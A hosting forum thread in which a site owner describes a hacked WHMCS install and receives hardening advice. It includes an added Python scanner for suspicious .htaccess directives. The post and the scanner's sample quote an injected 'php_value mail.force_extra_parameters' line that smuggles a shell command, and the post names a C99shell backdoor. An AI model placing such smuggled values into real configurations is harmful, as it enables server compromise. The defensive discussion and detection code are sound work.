
Website hacked, whmcs took over and bunch of domains registered


raymon


I am facing a really hard time with my account. It has been hacked by some deadbeat who created a bunch of orders and registered some domain names. I wonder if there is an issue with a loophole or something with whmcs. My whmcs says I should upgrade but HostingZoom offers whmcs 4.4.2 as their latest version.

 

All I know is that I ended up with my website inaccessible. It came up as a permission error. When I tried to access my website (on which whmcs is installed) I got a permission error.

I emailed my host Hosting Zoom and they said I have an invalid instruction in .htaccess.

This is what I got in htaccess:

php_value mail.force_extra_parameters '-t && ls /home/ > /home/webiano/public_html/result.txt'

 

Then I found a bunch of php files which I transferred to my local computer. 3 files were instantly removed by Microsoft Security Essentials and they are called the following:

VirTool:JS/Obfuscator.AQ

VirTool:JS/Obfuscator.BO

Backdoor:PHP/C99shell.G

 

The rest of the files are not detected by Security Essentials but they contain suspicious data/language progs.

 

1) Does anyone know how to prevent such a malicious takeover in the future? Any suggestions?

2) I want to restrict login through whmcs to only my range (my country). Is this possible?

3) Do you think imposing a password (htaccess) on the directory of whmcs would make it harder for the hacker to access my whmcs account?

 

I am really unsure how to defend myself. This takeover probably cost me a lot basically because of registered domains $70 and it left me really feeling unsafe regarding the whole thing. I don't know how to approach this issue and prevent future incidents. An insight would be really appreciated.
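A check for the kind of directive quoted in the post above, as an added example that is not part of the original thread: it flags `php_value`/`php_flag` lines in `.htaccess` files that set a risky PHP ini key or carry shell metacharacters in the value. The key shortlist, the function names and the sample text are assumptions made for this illustration.

```python
import re
from pathlib import Path

# PHP ini settings that a tenant's .htaccess should not be setting
# (editor's shortlist, an assumption; extend for your environment).
RISKY_KEYS = {
    "mail.force_extra_parameters", "sendmail_path",
    "auto_prepend_file", "auto_append_file", "allow_url_include",
}
# Shell metacharacters that indicate command chaining or redirection in a value.
SHELL_META = re.compile(r"&&|\|\||[;|`>]|\$\(")
DIRECTIVE = re.compile(
    r"^\s*(php_value|php_flag|php_admin_value|php_admin_flag)\s+(\S+)\s+(.*)$",
    re.IGNORECASE,
)

def scan_htaccess_text(text):
    """Return a list of (line_no, ini_key, reasons) for suspicious directives."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        m = DIRECTIVE.match(line)
        if not m:  # comments and unrelated directives are skipped
            continue
        key, value = m.group(2).lower(), m.group(3).strip().strip("'\"")
        reasons = []
        if key in RISKY_KEYS:
            reasons.append("risky ini key")
        if SHELL_META.search(value):
            reasons.append("shell metacharacters in value")
        if reasons:
            findings.append((no, key, reasons))
    return findings

def scan_tree(root):
    """Scan every .htaccess under root; returns {path: findings} for hits only."""
    hits = {}
    for path in Path(root).rglob(".htaccess"):
        found = scan_htaccess_text(path.read_text(errors="replace"))
        if found:
            hits[str(path)] = found
    return hits

# Constructed sample: a benign directive plus the line quoted in the post.
SAMPLE = (
    "php_value upload_max_filesize 16M\n"
    "php_value mail.force_extra_parameters "
    "'-t && ls /home/ > /home/webiano/public_html/result.txt'\n"
)

if __name__ == "__main__":
    for finding in scan_htaccess_text(SAMPLE):
        print(finding)
```

Run `scan_tree()` against the account's web root on a schedule and alert on any non-empty result; a hit means the file was modified by something other than the site owner's normal deployment.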


There are a lot of ways to defend yourself against this sort of attack, but frankly, since you don't understand what you're doing, you'd be much better looking for a hosted WHMCS solution - where someone else runs your WHMCS on their server and keeps it secure for you.

 

Hope you don't mind me being blunt; I really think this would be the safest thing for you maybe for a year or two until you understand all the issues.

 

It looks a little to me like your host isn't secure either; you should be looking for things like, at an absolute minimum:

  • mod_security
  • CSF firewall, with auto-block for hackers who hit mod_security rules a lot
  • suphp or fastcgi so php doesn't run as a common user
  • security hardening - generally

 

There are other things like virus/security scanning of uploads which is also a really good idea.


I agree with this one... Without prior knowledge on administrating or the know-how on keeping stuff secure, a hosted version would be your best bet; managed by someone else or a qualified company to handle your server management tasks. Having this behind you will help immensely.
